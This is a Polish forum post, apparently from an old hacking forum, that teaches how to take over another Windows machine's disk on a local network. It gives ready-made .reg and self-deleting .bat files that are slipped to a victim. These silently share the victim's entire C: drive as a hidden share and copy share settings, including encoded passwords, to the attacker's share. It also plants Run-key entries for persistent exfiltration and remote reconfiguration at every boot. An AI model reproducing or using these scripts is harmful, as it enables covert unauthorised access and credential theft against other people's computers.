Jak dostać się do dysku innego komputera w sieci


Jak dostać się do dysku innego komputera w sieci wykorzystując dziury w systemie ?

Metoda ta jest już trochę przestarzała i łatwa do wykrycia (aczkolwiek ciągle skuteczna), dlatego zdecydowałem się ją opisać.
Chyba każdy z nas miał już kiedyś do czynienia z rejestrem systemowym. Poprzez wpisywanie odpowiednich kluczy i wartości można całkowicie zrekonfigurować Windowsa i znacznie ograniczyć dostęp do zasobów komputera. W kluczu:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Network\LanMan\
[nazwa udostępnionego foldera lub drukarki]
zapisana jest konfiguracja wszystkich udostępnionych zasobów na naszym komputerze (folderów i drukarek). W kluczu tym znajdują się następujące zmienne :
· Flags
o 101, 191 - folder udostępniony tylko do odczytu
o 102, 192 - folder udostępniony do odczytu i zapisu
o 103, 193 - folder udostępniony w zależności od podanego hasła
· Parm1enc, Parm2enc - zakodowane hasła (maks. 8 liter)
· Path - ścieżka dostępu do folderu
· Remark - opis
· Type -
o 0 dla folderów
o 1 dla drukarek.

Tak wygląda zapis przykładowej konfiguracji udziału o nazwie 'instal'.
Manipulując tymi wartościami łatwo zmieniać konfiguracje udostępnień na swoim komputerze, ale jak wykorzystując rejestr systemowy aby zmienić i/lub odczytać konfiguracje innego komputera w sieci. Bardzo prymitywnym sposobem jest podsunięcie komuś w sieci zwykłego pliku rejestru. Np. takiego :
------in.reg------
REGEDIT4
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Network\LanMan\C$]
"Flags"=dword:00000192
"Type"=dword:00000000
"Path"="C:\\"
"Parm2enc"=hex:
"Parm1enc"=hex:
"Remark"=""
* ----- - - -----

Wzór pliku in.reg można bardzo łatwo uzyskać eksportując z rejestru zapis dowolnego udostępnienia. Później wystarczy odpowiednio go zmodyfikować (zmienić nazwę udziału, ścieżkę dostępu itd.)
Kiedy użytkownik na innym komputerze uruchomi ten plik (domyślnie - scalaj) wówczas informacje zostaną wprowadzone do rejestru systemowego. Po ponownym starcie systemu na komputerze ofiary będziemy mieli swobodny dostęp do jego dysku C (znaczek '$' przy nazwie udostępnienia oznacza, że udział nie będzie widoczny w Otoczeniu Sieciowym). Jak już wspomniałem metoda ta jest bardzo prymitywna choćby ze względu na komunikat, który pojawi się na ekranie komputera informujący o wprowadzeniu zmiennych do rejestru. Dlatego powinniśmy zadbać o to aby program regedit.exe był uruchamiany z parametrem /s - to zapewni nam dyskrecje. Można to zrobić wykorzystując plik bat :
-----start.bat-----
regedit.exe /s \\MAX\TAJNY$\in.reg
del start.bat
----- - - -----
MAX - nazwa naszego komputera
TAJNY$ - przykładowe udostępnienie, które musimy utworzyć i do którego należy przegrać plik in.reg
Wówczas użytkownikowi podsuwamy tylko plik start.bat, po uruchomieniu którego zawartość in.reg zostanie wprowadzona do rejestru. Podobnie bardzo łatwo można wyciągnąć zapis konfiguracji udostępnionych folderów z innego komputera w sieci (,takiego który swe zasoby ma zabezpieczone hasłem, bo tylko wtedy ma to sens) :
-----start.bat-----
regedit.exe /s /e \\MAX\TAJNY$\out.reg HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Network\LanMan
del start.bat
----- - - -----
TAJNY$ - w tym przypadku musi być ustawiony jako 'pełen dostęp'
Powyższe dwa sposoby dają nam możliwości jednorazowej zmiany lub jednorazowego pobrania informacji z rejestru. Ale co zrobić, żeby za każdym razem nie zmuszać użytkownika do uruchamiania bata ? W tym celu należy wykorzystać inny klucz w rejestrze :
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run
Tam właśnie zapisane są ścieżki wszystkich programów, które uruchamiane są po starcie systemu. Do tego klucza musimy wprowadzić odpowiednie zmienne, które zapewnią nam stały dostęp do rejestru systemowego innego komputera. W tym celu możemy wykorzystać opisaną wyżej metodę (pliku bat). Plik in.reg powinien wyglądać następująco :
------in.reg------
REGEDIT4
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run]
"WinStart"="regedit.exe /s /e \\\\MAX\\TAJNY$\\out.reg
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\ CurrentVersion\\Network\\LanMan"
"WinStart2"="if exist \\\\MAX\\TAJNY$\\in.reg regedit.exe /s
\\\\MAX\\TAJNY$\\out.reg"
*
----- - - -----
Po wprowadzeniu zawartości pliku in.reg do rejestru systemowego ofiary pierwsza zmienna :
"WinStart"="regedit.exe /s /e \\\\MAX\\TAJNY$\\out.reg
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\ CurrentVersion\\Network\\LanMan"
sprawi, że zawsze przy starcie systemu na komputerze ofiary Windows zapisze całą konfiguracje udostępnionych folderów i drukarek w pliku out.reg na naszym dysku. Jeżeli w tym czasie udział \\MAX\TAJNY$ nie będzie dostępny (np. jeżeli nasz komputer będzie wyłączony) wówczas start systemu opóźni się o około 1 sekundę. Zapis drugiej zmiennej jest trochę bardziej skomplikowany :
"WinStart2"="if exist \\\\MAX\\TAJNY$\\in.reg regedit.exe /s
\\\\MAX\\TAJNY$\\in.reg"
Podobnie jak w przypadku pierwszej zmiennej zawsze, gdy system będzie ładowany zostanie uruchomiony program regedit.exe i wprowadzi do rejestru systemowego ofiary zmienne znajdujące się w pliku in.reg na naszym dysku. Jednakże tutaj jest to trochę bardziej skomplikowane. Gdy program nie znalazłby pliku in.reg (np. gdy będziemy mieli wyłączony komputer) na ekranie komputera ofiary pojawiłby się komunikat o błędzie. Aby tego uniknąć przed uruchomieniem regedit.exe konieczne jest sprawdzenie czy istnieje taki plik. Dlatego wartość zmiennej ma postać :
if exist nazwapliku polecenie
Teraz, gdy tylko będziemy chcieli wprowadzić jakieś zmiany w konfiguracji udostępnionych folderów w komputerze ofiary wystarczy przygotować odpowiedni plik in.reg, przegrać go do folderu, który udostępniamy - TAJNY$ i poczekać, aż użytkownik w sieci włączy komputer, bądź zrestartuje system. Wówczas także będziemy mogli odczytać zapis konfiguracji udostępnionych folderów, a co za tym idzie - hasła, które po starcie systemu znajdą się w pliku out.reg, na naszym dysku. Trzeba jednak pamiętać o tym, że istnieje program "Monitor sieci", który pokazuje wszystkie komputery w sieci podłączone do zasobów określonego kompa.
Odpowiedz

[-]
Szybka odpowiedź

Disable AutoMedia embedding for this link.   MP3 Playlist

Weryfikacja przeciw botom
Zaznacz pole wyboru znajdujące się poniżej. Ten proces pozwala chronić forum przed botami spamującymi.